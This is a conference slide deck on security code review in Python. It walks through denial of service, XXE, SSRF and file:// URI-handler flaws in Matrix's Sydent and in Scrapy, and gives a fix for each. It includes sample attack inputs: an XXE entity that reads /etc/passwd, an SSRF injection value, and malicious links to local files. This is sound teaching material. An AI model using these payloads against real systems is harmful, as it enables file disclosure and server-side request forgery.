Security Code Review in Python

Claudio Salazar

About me

🧑‍💻  Application Security Engineer @ ChartMogul

🐍  9 years developing in Python

 

Expertise in:

 

🕸  web scraping

🤺  secure software development

🕵🏼‍♂️  vulnerability research

Agenda

  1. Denial of Service
  2. XML External Entity (XXE)
  3. Server Side Request Forgery (SSRF)
  4. URI handlers

Denial of service

General idea

# server_name is under my control
uri = b"https://%s/.well-known/matrix/server" % (server_name, )
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)

try:
  response = yield self._well_known_agent.request(b"GET", uri)
  body = yield readBody(response)
  
  if response.code != 200:
    raise Exception("Non-200 response %s" % (response.code, ))

    parsed_body = json.loads(body.decode('utf-8'))
    logger.info("Response from .well-known: %s", parsed_body)
    
    ...

Snippet from Matrix's Sydent 2.2.0

GET /.well-known/matrix/server HTTP/1.1
Host: domain.tld

Response from my malicious server

DoS by memory consumption

uri = b"https://%s/.well-known/matrix/server" % (server_name, )
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)

try:
  response = yield self._well_known_agent.request(b"GET", uri)
  body = yield readBody(response)
  
  if response.code != 200:
    raise Exception("Non-200 response %s" % (response.code, ))

    parsed_body = json.loads(
      body.decode('utf-8')
    )
    logger.info("Response from .well-known: %s", parsed_body)
  
    ...

Solution (Sydent 2.3.0)

uri = b"https://%s/.well-known/matrix/server" % (server_name,)
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)

try:
  response = await self._well_known_agent.request(b"GET", uri)
  body = await read_body_with_max_size(response, WELL_KNOWN_MAX_SIZE)
  
  if response.code != 200:
    raise Exception("Non-200 response %s" % (response.code,))

    parsed_body = json_decoder.decode(body.decode("utf-8"))
    logger.info("Response from .well-known: %s", parsed_body)

XML External Entity (XXE)

General idea

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example "hello"> ]>
<demo>
  <demoId>&example;</demoId>
</demo>
<demo>
  <demoId>hello</demoId>
</demo>

Things could go wrong

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/issue.net"> ]>
<demo>
  <demoId>&example;</demoId>
</demo>
<demo>
  <demoId>Ubuntu 20.04.3 LTS
</demoId>
</demo>
from scrapy.spiders import SitemapSpider

class MySpider(SitemapSpider):
    sitemap_urls = ['http://www.example.com/sitemap.xml']

    def parse(self, response):
        ...

Snippet from Scrapy documentation

class Sitemap(object):
  
    def __init__(self, xmltext):
        xmlp = lxml.etree.XMLParser(recover=True, remove_comments=True)
        self._root = lxml.etree.fromstring(xmltext, parser=xmlp)
        ...

Under the hood (scrapy 0.22.2 [2014])

# Documentation lxml.etree.XMLParser

XMLParser(
	..., 
	resolve_entities=True, 
	...
)
<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
 <sitemap>
   <loc>http://domain.tld/sitemap1.xml.gz</loc>
   <lastmod>2004-10-01T18:23:17+00:00</lastmod>
 </sitemap>
</sitemapindex>

Spider against normal sitemap

spider -> http://domain.tld/sitemap1.xml.gz
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>

<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <sitemap>
    <loc>http://domain.tld/&xxe;.xml</loc>
  </sitemap>
</sitemapindex>

Malicious sitemap

spider -> http://domain.tld/root:x:0:0:root:/root:/bin/bash[...].xml
class Sitemap(object):

    def __init__(self, xmltext):
        xmlp = lxml.etree.XMLParser(
          recover=True, 
          remove_comments=True, 
          resolve_entities=False
        )
        self._root = lxml.etree.fromstring(xmltext, parser=xmlp)
        ...

Solution (pull request)

Server Side Request Forgery (SSRF)

General idea

def render_POST(self, request):
  send_cors(request)

  args = get_args(request, ('matrix_server_name', 'access_token'))

  result = yield self.client.get_json(
    "matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s" % 
    (args['matrix_server_name'], urllib.parse.quote(args['access_token']),
    ),
  )

Snippet from Matrix's Sydent 2.2.0

def render_POST(self, request):
  send_cors(request)

  args = get_args(request, ('matrix_server_name', 'access_token'))

  result = yield self.client.get_json(
    "matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s" % 
    (args['matrix_server_name'], urllib.parse.quote(args['access_token']),
    ),
  )

Snippet from Matrix's Sydent 2.2.0

matrix_server_name=domain.tld/path_under_control?args_too=values_too#
def render_POST(self, request):
  send_cors(request)

  args = get_args(request, ('matrix_server_name', 'access_token'))

  result = yield self.client.get_json(
    "matrix://domain.tld/path_under_control?args_too=values_too#..."
  )

Snippet from Matrix's Sydent 2.2.0

matrix_server_name=domain.tld/path_under_control?args_too=values_too#

Solution (Sydent 2.3.0)

args = get_args(request, ("matrix_server_name", "access_token"))

matrix_server = args["matrix_server_name"].lower()

if not is_valid_matrix_server_name(matrix_server):
  request.setResponseCode(400)
  return {
    "errcode": "M_INVALID_PARAM",
    "error": "matrix_server_name must be a valid Matrix server name ...",
  }

result = await self.client.get_json(
  "matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s"
  % (
    matrix_server,
    urllib.parse.quote(args["access_token"]),
  ),
  1024 * 5,
)

Solution (Sydent 2.3.0)

args = get_args(request, ("matrix_server_name", "access_token"))

matrix_server = args["matrix_server_name"].lower()

if not is_valid_matrix_server_name(matrix_server):
  request.setResponseCode(400)
  return {
    "errcode": "M_INVALID_PARAM",
    "error": "matrix_server_name must be a valid Matrix server name ...",
  }

result = await self.client.get_json(
  "matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s"
  % (
    matrix_server,
    urllib.parse.quote(args["access_token"]),
  ),
  1024 * 5,
)
class FederationHttpClient(HTTPClient):
  def __init__(self, sydent: "Sydent") -> None:
    self.sydent = sydent
    self.agent = MatrixFederationAgent(
      BlacklistingReactorWrapper(
        reactor=self.sydent.reactor,
        ip_whitelist=sydent.config.general.ip_whitelist,
        ip_blacklist=sydent.config.general.ip_blacklist,
      ),
      ClientTLSOptionsFactory(sydent.config.http.verify_federation_certs)
      if sydent.use_tls_for_federation
      else None,
    )

Solution (Sydent 2.3.0)

class FederationHttpClient(HTTPClient):
  def __init__(self, sydent: "Sydent") -> None:
    self.sydent = sydent
    self.agent = MatrixFederationAgent(
      BlacklistingReactorWrapper(
        reactor=self.sydent.reactor,
        ip_whitelist=sydent.config.general.ip_whitelist,
        ip_blacklist=sydent.config.general.ip_blacklist,
      ),
      ClientTLSOptionsFactory(sydent.config.http.verify_federation_certs)
      if sydent.use_tls_for_federation
      else None,
    )

Solution (Sydent 2.3.0)

URI handlers

General idea

🤝 URI handlers give support for protocols

  • http(s)
  • s3
  • file
  • custom protocols

A normal spider

import scrapy
from scrapy.http import Request

class ExampleSpider(scrapy.Spider):
    name = "example_spider"
    allowed_domains = ["dangerous.tld"]
    start_urls = ["http://dangerous.tld/"]

    def parse(self, response):
        next_url = response.xpath("//a/@href").extract_first()
        yield Request(next_url, self.parse_next)
<!doctype html>
<body>
  <a href="/next">click!</a>
</body>

Oops, malicious server

import scrapy
from scrapy.http import Request

class ExampleSpider(scrapy.Spider):
    name = "example_spider"
    allowed_domains = ["dangerous.tld"]
    start_urls = ["http://dangerous.tld/"]

    def parse(self, response):
        next_url = response.xpath("//a/@href").extract_first()
        yield Request(next_url, self.parse_next)
<!doctype html>
<body>
  <a href="file:///etc/passwd">click!</a>
</body>

Oops, malicious server

In [1]: from urllib.parse import urlparse

In [2]: urlparse("file:///etc/passwd").hostname is None
Out[2]: True
  
In [3]: urlparse("file://dangerous.tld/etc/passwd").hostname
Out[3]: 'dangerous.tld'
<!doctype html>
<body>
  <a href="file://dangerous.tld/etc/passwd">click!</a>
</body>

Solution

# settings.py

...

DOWNLOAD_HANDLERS = {
    'file': None,
    'data': 'scrapy.core.downloader.handlers.datauri.DataURIDownloadHandler',
    'http': 'scrapy.core.downloader.handlers.http.HTTPDownloadHandler',
    'https': 'scrapy.core.downloader.handlers.http.HTTPDownloadHandler',
    's3': 'scrapy.core.downloader.handlers.s3.S3DownloadHandler',
    'ftp': 'scrapy.core.downloader.handlers.ftp.FTPDownloadHandler',
}

Recommendations

  1. Limit I/O interactions to expected sizes
  2. Beware of defaults in libraries you use
  3. Consider adding defense in depth
  4. Reduce your attack surface disabling not used features

Q & A

Gracias!

Thanks to:

  • Scrapy developers
  • Matrix security team

Security Code Review in Python

By csalazar

Security Code Review in Python

PyCon Chile/Argentina

  • 678